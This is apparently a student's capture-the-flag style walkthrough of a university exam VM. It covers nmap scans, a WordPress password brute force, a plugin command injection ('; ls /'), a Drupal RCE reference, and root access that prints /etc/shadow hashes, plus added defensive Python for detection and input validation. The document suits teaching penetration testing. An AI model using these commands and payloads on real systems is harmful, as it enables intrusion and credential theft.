Recon
172.16.218.144
Port
$ nmap 172.16.218.134/24 -sn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 17:24 HKT
Nmap scan report for 172.16.218.1
Host is up (0.00064s latency).
Nmap scan report for 172.16.218.2
Host is up (0.00056s latency).
Nmap scan report for 172.16.218.134
Host is up (0.00053s latency).
Nmap scan report for 172.16.218.144
Host is up (0.020s latency).
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.63 seconds
Services:
- 21, ftp, vsftpd 3.0.3
- 22, ssh
- 80, 443, 7904, 7905, apache http
$ IP=172.16.218.144
$ PORT=$(sudo nmap -sT --min-rate 10000 -p- $IP -oA nmap/ports | \
grep -E '^[0-9]+/tcp.*(open|filtered)' | awk -F '/' '{print $1}' | paste -sd ',') && \
sudo nmap -sT -sV -sC -O -p $PORT $IP -oA nmap/detail && \
sudo nmap --script=vuln -p $PORT $IP -oA nmap/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 17:27 HKT
Nmap scan report for 172.16.218.144
Host is up (0.00078s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:09:6e:d5:e8:bc:57:98:f8:14:71:c9:ec:20:e1:6a (RSA)
| 256 d8:0e:d8:92:8b:89:38:5e:15:44:cc:3d:f8:e8:10:84 (ECDSA)
|_ 256 f4:a1:d6:73:46:d1:d1:5f:2f:83:fe:43:e2:14:3a:38 (ED25519)
80/tcp open http Apache httpd
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache
| http-robots.txt: 1 disallowed entry
|_/mysecret/
443/tcp open http Apache httpd
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/mysecret/
|_http-server-header: Apache
7904/tcp open http Apache httpd
|_http-title: HKU COMP7904 EXAM – Just another WordPress site
|_http-generator: WordPress 5.4
|_http-server-header: Apache
7905/tcp open http Apache httpd
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-title: Home | Umami Food Magazine
|_http-server-header: Apache
|_http-generator: Drupal 8 (https://www.drupal.org)
MAC Address: 00:0C:29:2E:13:FE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
$ sudo nmap -sU --top-ports 20 $IP -oA nmap/udp
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-04 17:29 HKT
Nmap scan report for 172.16.218.144
Host is up (0.00072s latency).
PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp open|filtered nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:2E:13:FE (VMware)
Nmap done: 1 IP address (1 host up) scanned in 7.52 seconds
FTP
- Based on the credential found on port 80 (http) in the /mysecret directory.
- Log in to FTP and download the file.
- Identify the file type and check its content.
- ASCII file content: password of the blog -> try it on both sites.
80, http, Apache
- phpmyadmin
- phpinfo.php
- mysecret
$ curl http://172.16.218.144/robots.txt
User-agent: *
Disallow: /mysecret/
Default password: password
7904, WordPress
$ wpscan --url http://172.16.218.144:7904 --enumerate vp,vt,u,tt
Usernames:
- comp7904
- bart
- jerry
WordPress: 5.4.15
WordPress lore: 2.4.0
7905, Drupal
- http://172.16.218.144:7905/robots
- http://172.16.218.144:7905/user/password
- http://172.16.218.144:7905/user/register
Username: umami
Enumerate Drupal site: $ python cmseek.py -u http://172.16.218.144:7905/ -i drupal
Tool: Tuhinshubhra/CMSeeK
Vuln Analysis
Brute Force: WordPress Login
- Usernames obtained: comp7904, bart, jerry
- Brute force using wpscan:
$ wpscan --url http://172.16.218.144:7904 -t 128 --enumerate ap,at,u,tt -U users -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt
[!] Valid Combinations Found:
| Username: jerry, Password: qwerty
=> jerry / qwerty
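Detection-side view of the brute force above, as an added example that is not part of the original notes: a small Apache access-log analyser that flags the source of a wp-login.php guessing run and whether it ended in a redirect (a successful login). The log lines, IPs and user agent are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in Apache combined log format; the IPs, timestamps and
# user agent are made up for this example and are not from the original write-up.
SAMPLE_LOG = """\
172.16.218.134 - - [04/May/2024:17:40:01 +0800] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "WPScan v3.8"
172.16.218.134 - - [04/May/2024:17:40:01 +0800] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "WPScan v3.8"
172.16.218.134 - - [04/May/2024:17:40:02 +0800] "POST /wp-login.php HTTP/1.1" 200 4312 "-" "WPScan v3.8"
172.16.218.134 - - [04/May/2024:17:40:02 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8"
172.16.218.1 - - [04/May/2024:17:41:15 +0800] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"].split("?", 1)[0], int(m["status"])

def detect_wp_login_bruteforce(lines, threshold=3, window=timedelta(minutes=5)):
    """Flag source IPs with >= threshold failed wp-login.php POSTs inside one window."""
    # WordPress re-renders the form with HTTP 200 on a bad password and answers a
    # correct one with a 302 to wp-admin, so 200 counts as failure, 302 as success.
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            posts[rec[0]].append((rec[1], rec[4]))
    alerts = {}
    for ip, events in posts.items():
        events.sort()
        failures = [ts for ts, status in events if status == 200]
        worst = 0
        for i, start in enumerate(failures):  # densest run of failures within the window
            worst = max(worst, sum(1 for ts in failures[i:] if ts - start <= window))
        if worst >= threshold:
            # A 302 at or after the last failure means the guessing most likely succeeded.
            success = any(s == 302 and ts >= failures[-1] for ts, s in events)
            alerts[ip] = {"failures": worst, "success_after_failures": success}
    return alerts
```

On a real server the same logic runs over /var/log/apache2/access.log; the threshold and window are tuning knobs, and the `success_after_failures` flag is the event worth paging on.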
WordPress: Theme Editor
- Via the theme editor with users jerry and bart -> insufficient permissions
WordPress: Activity monitor, Cmd Injection
Lookup
Function: dig -x 127.0.0.1
Command Injection: dig -x 127.0.0.1; ls /
=> RCE
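Added defensive example, not the plugin's or the write-up's code: the same reverse-lookup feature written so that the `;`-separated input above is rejected before any process starts. Function names are my own; it only assumes `dig` is installed when `reverse_lookup` is actually called.

```python
import ipaddress
import subprocess

# The pattern behind the finding above, in Python terms, is concatenating user
# input into a shell string, e.g. os.system("dig -x " + user_input): the shell
# then treats ';' as a command separator. The functions below avoid both halves.

def build_reverse_lookup_argv(user_input):
    """Return ["dig", "-x", <ip>] for a valid IP literal, else raise ValueError.

    Two independent controls: the value must parse as an IPv4/IPv6 address (so
    ';', '|', '$(' and leading '-' option strings are rejected up front), and the
    result is an argv list handed to dig directly rather than a shell string.
    """
    candidate = user_input.strip()
    try:
        ip = ipaddress.ip_address(candidate)  # ValueError on anything that is not an IP
    except ValueError:
        raise ValueError(f"rejected lookup target: {candidate!r}") from None
    return ["dig", "-x", str(ip)]

def is_safe_target(user_input):
    """Boolean form of the same check, convenient for form validation and tests."""
    try:
        build_reverse_lookup_argv(user_input)
    except ValueError:
        return False
    return True

def reverse_lookup(user_input, timeout=5):
    """Run the validated lookup. shell=False means argv reaches dig verbatim, with
    no command interpretation in between; requires dig to be installed."""
    argv = build_reverse_lookup_argv(user_input)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, shell=False)
    return done.stdout
```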
Drupal 8: REST Module RCE
References:
POC: ping back
Foothold
WordPress: bart & cmd injection
Drupal 8 RCE
Privilege Escalation
Enum
DB Credential:
Scheduled task:
Scheduled Task: RCE Script
root@hku-comp7904-exam:~/.ssh# cat /etc/shadow | grep -E 'root|comp7904|bart|jerry'
root:*:18295:0:99999:7:::
comp7904:$6$BudMZHKHPtIDSxEB$3aXyRYMLyFxMX8aNH6ntOslkCAdIjLRoikKbRjPJzzeGZWm8kTN5piE1KecJw4LquuLzPfz.m4TGCt6ZXSFda0:18373:0:99999:7:::
bart:$6$2bvXNX9/$5ceH9KGHaJw3xE55qpbA2iQg5oJVJJR07e860/lnXn6KpGFeBEhi1/zbUpoNkztLv8N3sleOOi9aApDi2hEie1:18374:0:99999:7:::
jerry:$6$Dvul5tr1$ub9Rzwa5GcMqpvOSM7C7Qq.CTFl/CgroQwSQKSJ9LZYI8ZJyS58k2h6KxCuTkouX2EqUAdSZqeES9zM0eCWcF.:18374:0:99999:7:::
Maintain Access by ssh
House Cleaning
/root/.ssh/authorized_keys